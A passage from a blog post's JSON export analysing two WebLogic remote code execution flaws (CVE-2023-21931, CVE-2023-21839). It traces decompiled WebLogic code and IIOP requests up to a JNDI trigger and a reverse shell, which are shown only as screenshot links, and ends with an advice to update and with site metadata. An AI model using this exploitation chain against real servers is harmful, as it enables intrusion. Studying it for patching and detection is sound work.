a flag for the finally block.<\/span><\/p><p><span style=\"color: #000000;\">5. It tries to execute the privileged action by calling the <code>run<\/code> method of the provided <code>PrivilegedExceptionAction<\/code> object.<\/span><\/p><p><span style=\"color: #000000;\">1. If a <code>RuntimeException<\/code> is thrown, it is rethrown as is.<\/span><\/p><p><span style=\"color: #000000;\">2. If an <code>Exception<\/code> is thrown, it wraps it in a <code>PrivilegedActionException<\/code> and throws it.<\/span><\/p><p><span style=\"color: #000000;\">6. In the finally block, it checks if <code>var11<\/code> is <code>true<\/code>, indicating that an exception occurred during the action execution.<\/span><\/p><p><span style=\"color: #000000;\">Basically, The <code>doAs<\/code> method executes a privileged action on behalf of a specific subject. It pushes the subject onto the subject stack, attempts to run the action, and handles any exceptions that occur during execution. Finally, it ensures that the subject is popped from the stack before returning the result of the privileged action.<\/span><\/p><p><span style=\"color: #000000;\">Once the software hits the <code>actionResult = action.run();<\/code> it will go to the <code>invoke<\/code> method<\/span><\/p><p><span style=\"color: #000000;\">and from here it will go through multiple loops until it gets back to the <code>run<\/code> method, and it will continue down to the end of the <code>run<\/code> method and that will take us to <code>execute<\/code> method<\/span><\/p><pre><span style=\"color: #000000;\"><code>void execute(Runnable work) {\n    try {\n        ++this.executeCount;\n        this.timeStamp = System.currentTimeMillis();\n        this.startTimeNS = System.nanoTime();\n        this.underExecution = true;\n        this.setThreadPriority();\n        work.run();\n    } catch (ThreadDeath var9) {\n        throw var9;\n    } catch (RequestManager.ShutdownError var10) {\n        throw var10;\n    } catch (OutOfMemoryError var11) {\n        KernelLogger.logExecuteFailed(var11);\n        SelfTuningWorkManagerImpl.notifyOOME(var11);\n    } catch (Throwable var12) {\n        KernelLogger.logExecuteFailed(var12);\n    } finally {\n        this.underExecution = false;\n        this.usage = (int)(System.currentTimeMillis() - this.timeStamp);\n        this.usageNS = System.nanoTime() - this.startTimeNS;\n        this.timeStamp = 0L;\n        this.startTimeNS = 0L;\n    }\n}<\/code><\/span><\/pre><p><span style=\"color: #000000;\">from here you can notice that the <code>[*] id=4 RebindRequest<\/code> got sent and the other requests as well<\/span><\/p><p><span style=\"color: #000000;\">basically, you will notice that this process is building context and passing variables, and processing the serialization and deserialization.<\/span><\/p><p><span style=\"color: #000000;\">On <code>[*] id=6 ResolveRequest<\/code> you can notice that JNDI-Exploit is triggered, and from there our payload will be sent and executed and you can see we got the reverse shell back.<\/span><\/p><p><span style=\"color: #000000;\">Getting back to the network traffic<\/span><\/p><p><span style=\"color: #000000;\">We can see here all the requests from the first one <code>id=2 LocateRequest<\/code> until the last one <code>[*] id=7 ResolveRequest<\/code><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2ob9gadv1z0uqi3si29apw.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2oc6qvduv60uql5bsgcg9x.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2om8tmdv320uqlgwe44omi.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2omf2pdv3a0uql743xdps4.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2oms9cdv3m0uqla31x0k9r.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2omytqdv3w0uql8arj1lew.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">The TCP Stream 1, basically contains all the interactions of those requests<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2ox8hodvmg0uqifvk8ardu.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">TCP Stream 2, This is the interaction with JNDI<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2oz0rsdvot0uqi7ljs1c44.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">TCP Stream 3, the reverse shell payload class<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2oztwddvps0uqi7we56z84.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">TCP Stream 4, This is finally the reverse shell<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2p0l4mdvqi0uqi28fyen9i.png\" \/><\/span><\/p><h2><span style=\"color: #000000;\">Mitigation<\/span><\/h2><p><span style=\"color: #000000;\">It&#8217;s recommended to update to the latest version<\/span><\/p><h2><span style=\"color: #000000;\">Final thoughts<\/span><\/h2><p><span style=\"color: #000000;\">This wasn&#8217;t straightforward at all and it went sideways for a little bit<\/span><\/p><p><span style=\"color: #000000;\">but I learned a lot about Weblogic, and that will make the next analysis more in-depth and better.<\/span><\/p><p><span style=\"color: #000000;\">What really interests me the most is the T3 and GIOP protocols<\/span><\/p><h2><span style=\"color: #000000;\">Resources<\/span><\/h2><p><span style=\"color: #000000;\">&#8211; <a style=\"color: #000000;\" href=\"https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/Weblogic_Serialization_Vulnerability_and_IIOP_Protocol_en_US.md\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/Weblogic_Serialization_Vulnerability_and_IIOP_Protocol_en_US.md<\/a><\/span><\/p><p><span style=\"color: #000000;\">&#8211; <a style=\"color: #000000;\" href=\"https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/WebLogic_CVE-2023-21931_en_US.md\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/WebLogic_CVE-2023-21931_en_US.md<\/a><\/span><\/p><p><span style=\"color: #000000;\">#CVE-2023-21931 #CVE-2023-21839 #weblogic<\/span><\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p class=\"wp-block-paragraph\"><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction RCE via post-deserialization was found in  [&hellip;]<\/p>\n","protected":false},"author":149011790,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_wpcom_ai_launchpad_first_post":false,"_jetpack_feature_clip_id":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_post_was_ever_published":true},"categories":[1075,476,61],"tags":[477,1076],"class_list":["post-68382","post","type-post","status-publish","format-standard","hentry","category-year2023","category-vrx","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CVE-2023-21931 &amp; CVE-2023-21839 RCE via post-deserialization - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2023-21931 &amp; CVE-2023-21839 RCE via post-deserialization - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction RCE via post-deserialization was found in [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-26T07:38:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-07-24T10:16:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png\" \/>\n<meta name=\"author\" content=\"tracylamv2\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"tracylamv2\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/06\\\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\\\/\"},\"author\":{\"name\":\"tracylamv2\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\"},\"headline\":\"CVE-2023-21931 &#038; CVE-2023-21839 RCE via post-deserialization\",\"datePublished\":\"2023-06-26T07:38:26+00:00\",\"dateModified\":\"2023-07-24T10:16:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/06\\\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\\\/\"},\"wordCount\":1930,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clj2n55ehdswp0uqlbvkdd1te.png\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"2023\",\"vRx\",\"Press Release\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/06\\\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization\",\"name\":\"CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clj2n55ehdswp0uqlbvkdd1te.png\",\"datePublished\":\"2023-06-26T07:38:26+00:00\",\"dateModified\":\"2023-07-24T10:16:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clj2n55ehdswp0uqlbvkdd1te.png\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clj2n55ehdswp0uqlbvkdd1te.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2023-21931 &#038; CVE-2023-21839 RCE via post-deserialization\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\",\"name\":\"tracylamv2\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"caption\":\"tracylamv2\"},\"url\":\"https:\\\/\\\/version-2.com\\\/en\\\/author\\\/tracylamv2\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization","og_locale":"en_US","og_type":"article","og_title":"CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization - Version 2","og_description":"Introduction RCE via post-deserialization was found in [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization","og_site_name":"Version 2","article_published_time":"2023-06-26T07:38:26+00:00","article_modified_time":"2023-07-24T10:16:27+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png","type":"","width":"","height":""}],"author":"tracylamv2","twitter_card":"summary_large_image","twitter_misc":{"Written by":"tracylamv2","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/06\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\/"},"author":{"name":"tracylamv2","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365"},"headline":"CVE-2023-21931 &#038; CVE-2023-21839 RCE via post-deserialization","datePublished":"2023-06-26T07:38:26+00:00","dateModified":"2023-07-24T10:16:27+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/06\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\/"},"wordCount":1930,"commentCount":0,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png","keywords":["vRx","2023"],"articleSection":["2023","vRx","Press Release"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#respond"]}]},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/06\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\/","url":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization","name":"CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png","datePublished":"2023-06-26T07:38:26+00:00","dateModified":"2023-07-24T10:16:27+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/cve-2023-21931-and-cve-2023-21839-rce-via-post-deserialization#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"CVE-2023-21931 &#038; CVE-2023-21839 RCE via post-deserialization"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365","name":"tracylamv2","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","caption":"tracylamv2"},"url":"https:\/\/version-2.com\/en\/author\/tracylamv2\/"}]}},"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-hMW","jetpack_featured_media_url":"","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/68382","targetHints":{"allow":["GET"]}}],"collection":[{